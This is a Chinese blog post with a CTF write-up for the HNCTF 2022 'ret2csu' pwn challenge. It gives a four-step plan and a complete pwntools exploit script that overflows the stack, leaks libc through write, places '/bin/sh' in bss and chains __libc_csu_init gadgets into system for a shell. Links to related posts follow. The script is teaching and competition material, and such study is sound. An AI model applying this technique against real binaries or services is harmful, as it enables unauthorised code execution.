【PWN · ret2csu】[HNCTF 2022 WEEK2]ret2csu

最新推荐文章于 2025-06-06 13:38:34 发布
最新推荐文章于 2025-06-06 13:38:34 发布
阅读量905 收藏 2
点赞数
分类专栏: 【PWN · 高级栈相关】 文章标签: pwn ctf ret2csu stackoverflow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/134343528
版权

记一道ret2csu

一、题目

 

二、思路

1.ret2csu用write泄露write的真实地址->泄露libc->获得system的真实地址

2.ret2csu用read写/bin/sh字符串到bss段上

3.ret2csu用write将system的真实地址写到bss段上

4.ret2csu调用system

三、exp

from pwn import *
from pwn import p64
from LibcSearcher import *
context(arch='amd64',log_level='debug')

# io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28036)
elf=ELF('./pwn')
# libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
write_got=elf.got['write']
read_got=elf.got['read']

io.recvuntil(b'Input:\n')

def ready_csu(rdi,rsi,rdx,func_ptr_addr):
    payload=p64(0x4012A6)
    payload+=b'junkbyte'
    payload+=p64(0)
    payload+=p64(1)
    payload+=p64(rdi)
    payload+=p64(rsi)
    payload+=p64(rdx)
    payload+=p64(func_ptr_addr)
    return payload

def exec_csu(choice,rdi=-1,rsi=-1,rdx=-1,func_ptr_addr=-1):
    payload=p64(0x401290)
    if choice:
        payload+=b'deadbeef'*7
    else:
        payload+=b'junkbyte'
        payload+=p64(0)
        payload+=p64(1)
        payload+=p64(rdi)
        payload+=p64(rsi)
        payload+=p64(rdx)
        payload+=p64(func_ptr_addr)
    return payload

# gdb.attach(io)        
success('bss-addr:{}'.format(hex(elf.bss())))
raw_input()
start=0x401090

payload=b'a'*(0x100+8)
payload+=ready_csu(1,write_got,0x8,write_got)+exec_csu(0,0,elf.bss()+0x500,0x100,read_got)+exec_csu(1)+p64(start)
io.send(payload)
io.recvuntil(b'Ok.\n')

write_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
io.send(b'/bin/sh\x00')
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
success('write:{}'.format(hex(write_addr)))

payload=b'a'*(0x100+8)
payload+=ready_csu(0,elf.bss()+0x550,0x100,read_got)+exec_csu(0,elf.bss()+0x500,0,0,elf.bss()+0x550)+exec_csu(1)+p64(start)
io.send(payload)
io.recvuntil(b'Ok.\n')
io.send(p64(system_addr))
raw_input()
io.interactive()

从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 3587
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 463
PWN-栈溢出之ret2csu
ROP之ret2csu 【[HNCTF 2022 WEEK2] ret2csu
Chuang__的博客
03-11 1170
中级ROP之ret2csu,介绍了ret2csu的一般用法,以及个人小技巧
PWN:[WEEK2]ret2csu
m0_53932372的博客
10-19 288
pwn
ret2csu [HNCTF 2022 WEEK2]ret2csu
2401_88640181的博客
03-21 783
我有个问题;我第二次攻击本来是打算还用csu函数的,但是不知道为什么我一直打不通;!!!!下面的是我当时填的参数然后第二个问题;​。
PWN:[WEEK2]ret2libc
m0_53932372的博客
10-19 255
pwn
hnctf-pwn-week2
m0_64174759的博客
11-26 1079
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
PWN-中级ROP-[HNCTF 2022 WEEK2]ret2csu
最新发布
Welcome To Myon'Blog !
06-06 1145
本文分析了64位程序中利用__libc_csu_init函数进行栈溢出攻击的技术。通过控制寄存器传递参数,结合ret2csu技术泄露write函数地址,最终实现ret2libc攻击。文章详细讲解了gadgets选择、参数传递方法和攻击流程,并提供了完整的攻击脚本(exp)。该技术在不直接获取system函数和/bin/sh字符串的情况下,成功获取了shell权限,最终得到了flag。
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 505
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 482
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
ret2csu
F_Day_的博客
10-19 370
ret2csu 我认为这道题本身是没有什么实际意义的,但是它教会了我一种新的利用思路 这道题虽然明确指出利用函数__libc_csu_init来进行 但这个函数本身不是做为攻击者使用而设计的,它是设计出来初始化libc,只是恰好我们能够利用 因此,我认为这道题的主要目的是利用现有的汇编片段来实现攻击(与ret2por比较类似) __libc_csu_init 在本题里,这个函数的汇编代码如下(可能与你看到的有点不同) ; void _libc_csu_init(void) public __libc_c
CTF|ropemporium ret2csu题型
skyattractive的博客
06-14 847
CTF|ropemporium ret2csu题型 题目来源:https://ropemporium.com/challenge/ret2csu.html 这个题只能下载64位文件 IDA查看后发现gets存在栈溢出,题目条件是ret2win的第三个函数必须是“0xdeadcafebabebeef” ret2win函数里面有system x86 与 x64 的区别: x86 都是保存在栈上面的, 而 x64 中的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 中,如果还
19.4-STM32接收数据-状态显示在屏幕 openMV寻迹与小车控制 Openmv+STM32F103C8T6视觉巡线小车.md
06-05
19.4-STM32接收数据-状态显示在屏幕 openMV寻迹与小车控制 Openmv+STM32F103C8T6视觉巡线小车
乐器类.zip
06-05
乐器类.zip
基于SpringBoot与Vue的分布式运动健康管理系统.zip
06-05
基于SpringBoot与Vue的分布式运动健康管理系统.zip
工程机械液压挖掘机动臂下降势能回收技术研究:基于闭式回路与模糊PI控制的节能系统设计及实验验证(含详细可运行代码及解释)
06-05
内容概要:该论文深入研究了液压挖掘机动臂下降势能回收技术,旨在解决传统液压挖掘机能耗高的问题。提出了一种新型闭式回路势能回收系统,利用模糊PI自整定控制算法控制永磁无刷直流电动机,实现了变转速容积调速控制,消除了节流和溢流损失。通过建立数学模型和仿真模型,分析了不同负载下的系统性能,并开发了试验平台验证系统的高效性和节能效果。研究还涵盖了执行机构能量分布分析、系统元件参数匹配及电机控制性能优化,为液压挖掘机节能技术提供了理论和实践依据。此外,通过实验验证,该系统相比传统方案可降低28%的能耗,控制系统响应时间缩短40%,为工程机械的绿色化、智能化发展提供了关键技术支撑。 适合人群:从事工程机械设计、制造及维护的工程师和技术人员,以及对液压系统节能技术感兴趣的科研人员。 使用场景及目标:①理解液压挖掘机闭式回路动臂势能回收系统的原理和优势;②掌握模糊PI自整定控制算法的具体实现;③学习如何通过理论建模、仿真和实验验证来评估和优化液压系统的性能。 其他说明:此研究不仅提供了详细的理论分析和数学建模,还给出了具体的仿真代码和实验数据,便于读者在实际工作中进行参考和应用。研究结果表明,该系统不仅能显著提高能源利用效率,还能延长设备使用寿命,降低维护成本,具有重要的工程应用价值。
营销号—营销号专用-58首.zip
06-05
营销号—营销号专用-58首.zip
基于深度学习技术的行人重识别系统研究.zip
06-05
基于深度学习技术的行人重识别系统研究.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值